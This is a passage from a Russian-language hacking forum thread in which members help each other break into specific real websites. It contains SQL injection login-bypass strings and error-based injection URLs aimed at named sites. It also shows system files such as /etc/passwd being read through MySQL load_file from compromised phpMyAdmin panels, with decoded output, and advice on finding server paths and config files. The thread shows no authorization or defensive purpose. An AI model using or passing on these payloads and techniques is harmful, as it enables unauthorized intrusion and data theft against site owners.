Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    888
    Reputations:
    363
    это ошибка PHP, а не MySQL
     
    _________________________
  2. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Читал статьи, но не могу понять как обходить фильтра XSS. Допустим в SQL-Инъекциях всё ясно, как обходить. Кто может мне объяснить нормально.
    [​IMG]
    Строка 360 исходного кода. <input type="text" name="search_text" id="search_text" value="&quot;&gt;alert('XSS')" maxlength="">
    Выделенный текст это я так понимаю фильтрующие элементы.. Если бы XSS запрос так и отображался, то значит XSS-Инъекции нет?
     
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126

    Вот еще посмотри https://forum.antichat.ru/threads/46016/page-952#post-2979092
     
    _________________________
    Unknowhacker likes this.
  4. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    135
    Likes Received:
    8
    Reputations:
    6
    Есть доступ phpmyadmin with good video))
    Как узнать директорию, в которой сайт лежит из pma?
    Есть готовые скрипты для этого?
    Енжой, over 6500 video)
     
  5. Scipio

    Scipio Members of Antichat

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    например по умолчанию на дебианподобных осях пма лежит в /usr/share/phpmyadmin
     
    _________________________
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    888
    Reputations:
    363
    ему document_root нужен, похоже
    из пма попробуйте почитать файлы через local data infile. либо как обычно через ошибки на сайте
     
    _________________________
  7. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    135
    Likes Received:
    8
    Reputations:
    6
    А нету готового скрипта, который читает файлы и в случае не пустого множества возвращает путь.
    В общем у меня 3 сайта pma с пороно))
    Один на load_file passwd возвращает
    726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a62696e3a783a313a313a62696e3a2f62696e2e2e2e
    Второй Blob
    -------------------------
    По идее есть же скрипт, который через множество селектов получает site_directory.
    Смысл самому эти селекты делать)?
     
    #227 huntercs16, 18 Jun 2015
    Last edited: 18 Jun 2015
  8. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a62696e3a783a313a313a62696e3a2f62696e2e2e2e
    Это
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin...



    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/include/common.php on line 462

    Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/include/common.php on line 466


    Вот и путь


    Notice
    : Undefined index: host in /var/www/smf/Sources/Load.php on line 1913

    Notice: Undefined index: host in /var/www/smf/Sources/Load.php on line 1913

    Notice: Undefined index: welcome_guest_activate in /var/www/smf/Sources/Subs.php on line 3165

    Notice: Undefined index: welcome_guest in /var/www/smf/Sources/Subs.php on line 3165

    Notice: Undefined index: lang_locale in /var/www/smf/Sources/Subs.php on line 868
     
    _________________________
    #228 kingbeef, 19 Jun 2015
    Last edited: 19 Jun 2015
    huntercs16 likes this.
  9. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    8
    Reputations:
    1
    Все нормально тебе возвращается. И через файлы можно получить путь до сайта. В каких файлах надо искать зависит от ОС и веб сервера.
     
  10. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    Хочу посмотреть логи сервера, и как я понял к каждому сайту есть свой конфиг. В основном конфиге есть такая строчка
    include vhost/*.conf .. Т.е все файлы с расширением conf, могу ли я подобрать имена файлов через читалку load_file (mysql)?
     
  11. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    8
    Reputations:
    1
    Возможно, но наверно только путем перебора. Если имена сайтов на этом сервере известны, то пробуй вначале варианты этих имен. К примеру есть сайт site.com, то пробуй открыть site_com.conf, site.conf, site.com.conf и т.п.
     
  12. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    888
    Reputations:
    363
    это AFD: Arbitrary File Download, а не LFI
     
    _________________________
  14. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    134
    Likes Received:
    4
    Reputations:
    0
    сайт http://www.bogema-hotel.ru/access_admin.php - с уязвимой админкой.
    Вставляю в login "admin ' or '1' =1/*" Перебираю варианты - ' or '1' =1-- но результата не достигаю.
    Спустя час решил написать сюда.
    Почему так? Фильтрация или неверно заданный запрос? Хотя делал все по авторской статье.
     
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    По какой это статье вы делаете?
     
  16. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Что-то мне подсказывает что вот эту
    Code:
    https://rdot.org/forum/showthread.php?t=124
    ну или она же тут, на ачате :)
    Code:
    http://forum.antichat.ru/threads/43966/
    и скорее всего пробует пункт 1.3 Уязвимы поле логин и пароль, обход авторазации :)
     
  17. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    134
    Likes Received:
    4
    Reputations:
    0
    Именно по ней. Именно по пункту 1.3 подставляя в поле логин и пароль соотвественно.
    Но даже если просто в пароль не давало результата и сообщения об ошибке ,если писал в логин
    Code:
    Admin' --
    и
    Code:
    Admin' --
     
  18. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Инъекция присутствует. Пробуйте далее. Если нагрузка с обходом авторизации не проходит, попробуйте другие вектора.
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Можно спокойно крутить error based.
     
    _________________________
  20. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    134
    Likes Received:
    4
    Reputations:
    0
    Другой вектор:
    Такой же сдвиг cms

    Code:
    http://www.kazanboats.ru/index.php?id=59"+(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
    - пишет hek

    Code:
    http://www.kazanboats.ru/index.php?id=59%20+%281%29and%28+1+from%28+count%28*%29,concat%28%28+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--
    Выбрасывает на страницу

    Пробую замаркировать select при помощи concat - но не получается. Возможно, неправильно формирую запрос.
    Сейчас пытаюсь просто найти кол-во таблиц - http://www.kazanboats.ru/index.php?id=59'+order+by+1000/* и http://www.kazanboats.ru/index.php?id=59'+order+by+1/*
    Выдает одинаковый результат. Явно слепая иньекция.
    Но если убрать кавычки или минус перед 59 - страница появляется.

    Подскажи с самого простого, с поиска кол-ва таблиц.
    Нужно шифровать запрос? order+by?
     
Loading...